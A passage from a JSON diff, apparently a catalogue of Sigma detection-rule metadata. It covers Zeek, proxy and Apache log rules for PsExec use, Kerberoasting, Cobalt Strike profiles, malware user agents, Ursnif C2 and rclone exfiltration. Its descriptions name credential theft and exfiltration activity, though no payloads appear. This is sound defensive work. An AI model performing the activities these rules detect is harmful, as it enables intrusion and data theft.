"021310d9-30a6-480a-84b7-eaa69aeb92bb", + "value": "First Time Seen Remote Named Pipe - Zeek" + }, + { + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "meta": { + "author": "Samir Bousseaden, @neu5ron, Tim Shelton", + "creation_date": "2020/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_smb_converted_win_susp_psexec.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_psexec.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "f1b3a22a-45e6-4004-afb5-4291f9c21166", + "value": "Suspicious PsExec Execution - Zeek" + }, + { + "description": "Detects known sensitive file extensions via Zeek", + "meta": { + "author": "Samir Bousseaden, @neu5ron", + "creation_date": "2020/04/02", + "falsepositive": [ + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" + ], + "filename": "zeek_smb_converted_win_susp_raccess_sensitive_fext.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml" + ], + "tags": [ + "attack.collection" + ] + }, + "uuid": "286b47ed-f6fe-40b3-b3a8-35129acd43bc", + "value": "Suspicious Access to Sensitive File Extensions - Zeek" + }, + { + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "meta": { + "author": "@neu5ron, Teymur Kheirkhabarov, oscd.community", + "creation_date": "2020/04/02", + "falsepositive": [ + "Transferring sensitive files for legitimate administration work by legitimate administrator" + ], + "filename": "zeek_smb_converted_win_transferring_files_with_credential_data.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/neo23x0/sigma/blob/373424f14574facf9e261d5c822345a282b91479/rules/windows/builtin/win_transferring_files_with_credential_data_via_network_shares.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" + ] + }, + "uuid": "2e69f167-47b5-4ae7-a390-47764529eff5", + "value": "Transferring Files with Credential Data via Network Shares - Zeek" + }, + { + "description": "Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting", + "meta": { + "author": "sigma", + "creation_date": "2020/02/12", + "falsepositive": [ + "Normal enterprise SPN requests activity" + ], + "filename": "zeek_susp_kerberos_rc4.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://adsecurity.org/?p=3458", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_susp_kerberos_rc4.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "503fe26e-b5f2-4944-a126-eab405cc06e5", + "value": "Kerberos Network Traffic RC4 Ticket Encryption" + }, + { + "description": "Detect update check performed by Advanced IP Scanner and Advanced Port Scanner", + "meta": { + "author": "Axel Olsson", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proxy_adv_ip_port_scanner_upd_check.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.advanced-ip-scanner.com/", + "https://www.advanced-port-scanner.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_adv_ip_port_scanner_upd_check.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1590" + ] + }, + "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", + "value": "Advanced IP/Port Scanner Update Check" + }, + { + "description": "Detects suspicious user agent string of APT40 Dropbox tool", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/11/12", + "falsepositive": [ + "Old browsers" + ], + "filename": "proxy_apt40.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "Internal research from Florian Roth", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt40.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "5ba715b6-71b7-44fd-8245-f66893e81b3d", + "value": "APT40 Dropbox Tool User Agent" + }, + { + "description": "Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "proxy_apt_domestic_kitten.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt_domestic_kitten.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "6c939dfa-c710-4e12-a4dd-47e1f10e68e1", + "value": "Domestic Kitten FurBall Malware Pattern" + }, + { + "description": "Detects Baby Shark C2 Framework communication patterns", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_baby_shark.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_baby_shark.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", + "value": "BabyShark Agent Pattern" + }, + { + "description": "Detects HTTP requests used by Chafer malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_chafer_malware.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://securelist.com/chafer-used-remexi-malware/89538/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_chafer_malware.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "fb502828-2db0-438e-93e6-801c7548686d", + "value": "Chafer Malware URL Pattern" + }, + { + "description": "Detects Malleable Amazon Profile", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_amazon.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", + "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_amazon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "953b895e-5cc9-454b-b183-7f3db555452e", + "value": "CobaltStrike Malleable Amazon Browsing Traffic Profile" + }, + { + "description": "Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_malformed_uas.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_malformed_uas.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "41b42a36-f62c-4c34-bd40-8cb804a34ad8", + "value": "CobaltStrike Malformed UAs in Malleable Profiles" + }, + { + "description": "Detects Malleable (OCSP) Profile with Typo (OSCP) in URL", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_ocsp.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_ocsp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "37325383-740a-403d-b1a2-b2b4ab7992e7", + "value": "CobaltStrike Malleable (OCSP) Profile" + }, + { + "description": "Detects Malleable OneDrive Profile", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_onedrive.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_onedrive.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", + "value": "CobaltStrike Malleable OneDrive Browsing Traffic Profile" + }, + { + "description": "Detects WebDav DownloadCradle", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/04/06", + "falsepositive": [ + "Administrative scripts that download files from the Internet", + "Administrative scripts that retrieve certain website contents", + "Legitimate WebDAV administration" + ], + "filename": "proxy_downloadcradle_webdav.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_downloadcradle_webdav.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", + "value": "Windows WebDAV User Agent" + }, + { + "description": "Detects download of certain file types from hosts with dynamic DNS names (selected list)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/08", + "falsepositive": [ + "Software downloads" + ], + "filename": "proxy_download_susp_dyndns.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_dyndns.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1105", + "attack.t1568" + ] + }, + "uuid": "195c1119-ef07-4909-bb12-e66f5e07bf3c", + "value": "Download from Suspicious Dyndns Hosts" + }, + { + "description": "Detects download of certain file types from hosts in suspicious TLDs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/07", + "falsepositive": [ + "All kinds of software downloads" + ], + "filename": "proxy_download_susp_tlds_blacklist.yml", + "level": "low", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", + "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", + "https://www.spamhaus.org/statistics/tlds/", + "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566", + "attack.execution", + "attack.t1203", + "attack.t1204.002" + ] + }, + "uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", + "value": "Download from Suspicious TLD" + }, + { + "description": "Detects executable downloads from suspicious remote systems", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/13", + "falsepositive": [ + "All kind of software downloads" + ], + "filename": "proxy_download_susp_tlds_whitelist.yml", + "level": "low", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_whitelist.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566", + "attack.execution", + "attack.t1203", + "attack.t1204.002" + ] + }, + "uuid": "b5de2919-b74a-4805-91a7-5049accbaefe", + "value": "Download EXE from Suspicious TLD" + }, + { + "description": "Detects user agent and URI paths used by empire agents", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/13", + "falsepositive": [ + "Valid requests with this exact user agent to server scripts of the defined names" + ], + "filename": "proxy_empire_ua_uri_combos.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/BC-SECURITY/Empire", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empire_ua_uri_combos.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", + "value": "Empire UserAgent URI Combo" + }, + { + "description": "Detects suspicious empty user agent strings in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_empty_ua.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/Carlos_Perez/status/883455096645931008", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empty_ua.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", + "value": "Empty User Agent" + }, + { + "description": "Detects URL pattern used by iOS Implant", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ios_implant.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "https://twitter.com/craiu/status/1167358457344925696", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ios_implant.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.collection", + "attack.t1005", + "attack.t1119", + "attack.credential_access", + "attack.t1528", + "attack.t1552.001" + ] + }, + "uuid": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6", + "value": "iOS Implant URL Pattern" + }, + { + "description": "Detects Java class download in proxy logs, e.g. used in Log4shell exploitation attacks against Log4j.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/12/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_java_class_download.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_java_class_download.yml" + ], + "tags": [ + "attack.initial_access" + ] + }, + "uuid": "53c15703-b04c-42bb-9055-1937ddfb3392", + "value": "Java Class Proxy Download" + }, + { + "description": "Detects Windows PowerShell Web Access", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/13", + "falsepositive": [ + "Administrative scripts that download files from the Internet", + "Administrative scripts that retrieve certain website contents" + ], + "filename": "proxy_powershell_ua.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_powershell_ua.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "c8557060-9221-4448-8794-96320e6f3e74", + "value": "Windows PowerShell User Agent" + }, + { + "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_pwndrop.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://breakdev.org/pwndrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_pwndrop.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.001", + "attack.t1102.003" + ] + }, + "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", + "value": "PwnDrp Access" + }, + { + "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/05", + "falsepositive": [ + "User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)" + ], + "filename": "proxy_raw_paste_service_access.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.virustotal.com/gui/domain/paste.ee/relations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_raw_paste_service_access.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.001", + "attack.t1102.003", + "attack.defense_evasion" + ] + }, + "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", + "value": "Raw Paste Service Access" + }, + { + "description": "Detects a flashplayer update from an unofficial location", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/10/25", + "falsepositive": [ + "Unknown flash download locations" + ], + "filename": "proxy_susp_flash_download_loc.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_susp_flash_download_loc.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1189", + "attack.execution", + "attack.t1204.002", + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "4922a5dd-6743-4fc2-8e81-144374280997", + "value": "Flash Player Update from Suspicious Location" + }, + { + "description": "Detects suspicious requests to Telegram API without the usual Telegram User-Agent", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/05", + "falsepositive": [ + "Legitimate use of Telegram bots in the company" + ], + "filename": "proxy_telegram_api.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.002" + ] + }, + "uuid": "b494b165-6634-483d-8c47-2026a6c52372", + "value": "Telegram API Access" + }, + { + "description": "Detects Turla ComRAT patterns", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_turla_comrat.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_turla_comrat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001", + "attack.g0010" + ] + }, + "uuid": "7857f021-007f-4928-8b2c-7aedbe64bb82", + "value": "Turla ComRAT" + }, + { + "description": "Detects suspicious user agent strings used in APT malware in proxy logs", + "meta": { + "author": "Florian Roth, Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Old browsers" + ], + "filename": "proxy_ua_apt.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_apt.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "6ec820f2-e963-4801-9127-d8b2dce4d31b", + "value": "APT User Agent" + }, + { + "description": "Detects Bitsadmin connections to IP addresses instead of FQDN names", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_bitsadmin_susp_ip.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_ip.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190" + ] + }, + "uuid": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", + "value": "Bitsadmin to Uncommon IP Server Address" + }, + { + "description": "Detects Bitsadmin connections to domains with uncommon TLDs", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2019/03/07", + "falsepositive": [ + "Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca" + ], + "filename": "proxy_ua_bitsadmin_susp_tld.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/jhencinski/status/1102695118455349248", + "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190" + ] + }, + "uuid": "9eb68894-7476-4cd6-8752-23b51f5883a7", + "value": "Bitsadmin to Uncommon TLD" + }, + { + "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_cryptominer.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65", + "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_cryptominer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", + "value": "Crypto Miner User Agent" + }, + { + "description": "Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_frameworks.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_frameworks.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", + "value": "Exploit Framework User Agent" + }, + { + "description": "Detects suspicious user agent strings user by hack tools in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_hacktool.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", + "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_hacktool.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "c42a3073-30fb-48ae-8c99-c23ada84b103", + "value": "Hack Tool User Agent" + }, + { + "description": "Detects suspicious user agent strings used by malware in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_malware.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "http://www.botopedia.org/search?searchword=scan&searchphrase=all", + "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", + "https://perishablepress.com/blacklist/ua-2013.txt", + "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", + "value": "Malware User Agent" + }, + { + "description": "Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/10/18", + "falsepositive": [ + "Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations" + ], + "filename": "proxy_ua_rclone.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://rclone.org/", + "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_rclone.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", + "value": "Rclone Activity via Proxy" + }, + { + "description": "Detects suspicious malformed user agent strings in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_susp.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "7195a772-4b3f-43a4-a210-6a003d65caa1", + "value": "Suspicious User Agent" + }, + { + "description": "Detects suspicious User Agent strings that end with an equal sign, which can be a sign of base64 encoded values used as User Agent string", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_susp_base64.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp_base64.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", + "value": "Suspicious Base64 User Agent" + }, + { + "description": "Detects Ursnif C2 traffic.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ursnif_malware_c2_url.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_c2_url.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1204.002", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "932ac737-33ca-4afd-9869-0d48b391fcc9", + "value": "Ursnif Malware C2 URL Pattern" + }, + { + "description": "Detects download of Ursnif malware done by dropper documents.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ursnif_malware_download_url.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_download_url.yml" + ], + "tags": "No established tags" + }, + "uuid": "a36ce77e-30db-4ea0-8795-644d7af5dfb4", + "value": "Ursnif Malware Download URL Pattern" + }, + { + "description": "Detects a segmentation fault error message caused by a creashing apache worker process", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/28", + "falsepositive": [ + "Unknown" + ], + "filename": "web_apache_segfault.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "http://www.securityfocus.com/infocus/1633", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_segfault.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.004" + ] + }, + "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1", + "value": "Apache Segmentation Fault" + }, + { + "description": "Detects an issue in apache logs that reports threading related errors", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/22", + "falsepositive": [ + "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185" + ], + "filename": "web_apache_threading_error.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + 